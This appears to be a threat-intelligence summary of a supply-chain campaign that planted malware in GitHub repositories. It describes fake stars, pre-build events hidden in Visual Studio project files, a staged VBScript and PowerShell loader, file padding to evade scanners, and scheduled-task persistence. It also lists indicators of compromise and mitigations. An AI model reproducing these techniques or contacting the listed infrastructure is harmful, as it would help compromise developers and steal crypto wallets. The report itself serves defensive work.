New Technique Detected in an Open Source Supply Chain Attack

Attackers manipulated GitHub search ranking and repository metadata to surface malicious projects that execute hidden payloads during Visual Studio builds. The multi-stage implant decodes and runs a base64 PowerShell via VBScript, fetches encrypted archives (including a padded feedbackAPI.exe with Keyzetsu-clipper similarities), and creates persistence with a scheduled task. #Keyzetsu #GitHub

Keypoints

Threat actors boosted malicious repo visibility by auto-updating files via GitHub Actions and using multiple fake accounts to add stars.
Malware is concealed inside Visual Studio project files (.csproj/.vcxproj) as pre-build events that execute automatically during project builds.
The embedded pre-build payload writes a batch and VBScript which decodes and runs a base64 PowerShell script that performs geolocation checks and remote downloads.
The PowerShell downloads encrypted .7z archives from attacker-controlled URLs, extracts them with a predefined password, and executes contained binaries (e.g., feedbackAPI.exe).
Attackers padded an executable to 750MB to evade scanning services and the delivered binary shows similarities to the Keyzetsu clipper targeting crypto wallets.
Persistence is achieved by creating a shortcut to the executable and adding a scheduled task named “Feedback_API_VS_Services_Client” that runs daily at 4AM.

MITRE Techniques

[T1195] Supply Chain Compromise – Distributing malware via manipulated open-source repositories to trick developers (‘manipulating GitHub’s search functionality… using meticulously crafted repositories to distribute malware’).
[T1059] Command and Scripting Interpreter – Using batch scripts, VBScript, and base64-decoded PowerShell to execute the payload (‘base64-encoded PowerShell script that is decoded and executed by the VBScript file’).
[T1027] Obfuscated Files or Information – Hiding malicious logic in project files to avoid detection (‘conceal their malware primarily as obfuscated code deep within the .csproj or .vcxproj files’).
[T1105] Ingress Tool Transfer – Downloading encrypted archives and binaries from attacker-controlled URLs and executing extracted content (‘Downloads encrypted files from each URL, extracts them with a predefined password, and executes the extracted files’).
[T1053.005] Scheduled Task/Job – Establishing persistence by creating a scheduled task that runs the malicious executable daily (‘creating a scheduled task named “Feedback_API_VS_Services_Client” that executes the shortcut at 4AM’).
[T1078] Valid Accounts – Leveraging many fake GitHub accounts to star repositories and boost perceived trustworthiness (‘attackers employed multiple fake accounts to add bogus stars’).
[T1016] System Network Configuration Discovery – Determining victim location by resolving the machine’s public IP and retrieving its country code to tailor payload behavior (‘Retrieves the country code of the machine’s IP address, determining whether the machine is based in Russia’).

Indicators of Compromise

[URL] Malicious hosting and payload delivery – hxxps[:]//cdn.discordapp[.]com/attachments/…/VisualStudioEN.7z, hxxps[:]//cdn.discordapp[.]com/attachments/…/VisualStudioRU.7z, and several hxxps[:]//rentry[.]co/raw links.
[File name] Delivered/extracted binaries – feedbackAPI.exe, main.exe (hosted on CDN), and archived VisualStudioEN.7z/VisualStudioRU.7z.
[File hash] Example hashes observed – 08b799d56265e93f6aae4f089808d1cb, cc9d54b78688ef6f41e4f4d0c8bced3e04bfcedc.
[Domain] Attacker-controlled domains – ooocyber[.]keenetic[.]pro (used in campaign infrastructure).
[IP] Infrastructure IP example – 188[.]113[.]132[.]109 (listed as related to hosting/downloads).
[Paste/raw resources] Configuration and payload pointers – https://rentry.co/MuckCompanyMMC/raw, hxxps[:]//paste[.]fo/raw/dd6cd76eb5a0, and other rentry/paste/textbin URLs.

The technical attack chain begins with visibility manipulation: attackers create repositories with popular names and then use GitHub Actions to frequently touch a benign file (commonly named “log”) to appear as recently updated, while a network of newly created fake accounts adds stars to boost “most stars” ranking. Once a developer clones or builds such a repository, a pre-build event embedded in a .vcxproj/.csproj triggers a staged execution—first a batch script creates a temporary folder and writes a VBScript, which decodes and runs a base64-encoded PowerShell payload.

The decoded PowerShell performs environment checks (it retrieves the machine’s IP country code to conditionally select payloads), then downloads encrypted .7z archives from attacker-controlled URLs (Discord CDN, rentry, paste resources). The script extracts these archives using a predefined password, executes the extracted binaries (notably feedbackAPI.exe), and contains error handling to fail silently. Attackers padded feedbackAPI.exe up to ~750MB to prevent automated scanning by services with file-size limits.

Post-execution behavior includes creating a shortcut to the installed executable and registering a scheduled task named “Feedback_API_VS_Services_Client” to run the shortcut daily at 4AM, giving the malware persistence without prompting the user. Mitigations include manual inspection of project files for unexpected pre-build events, scanning .csproj/.vcxproj contents for embedded scripts or base64 blobs, validating stargazer accounts and recent update patterns, and restricting automated build processes from executing untrusted project files.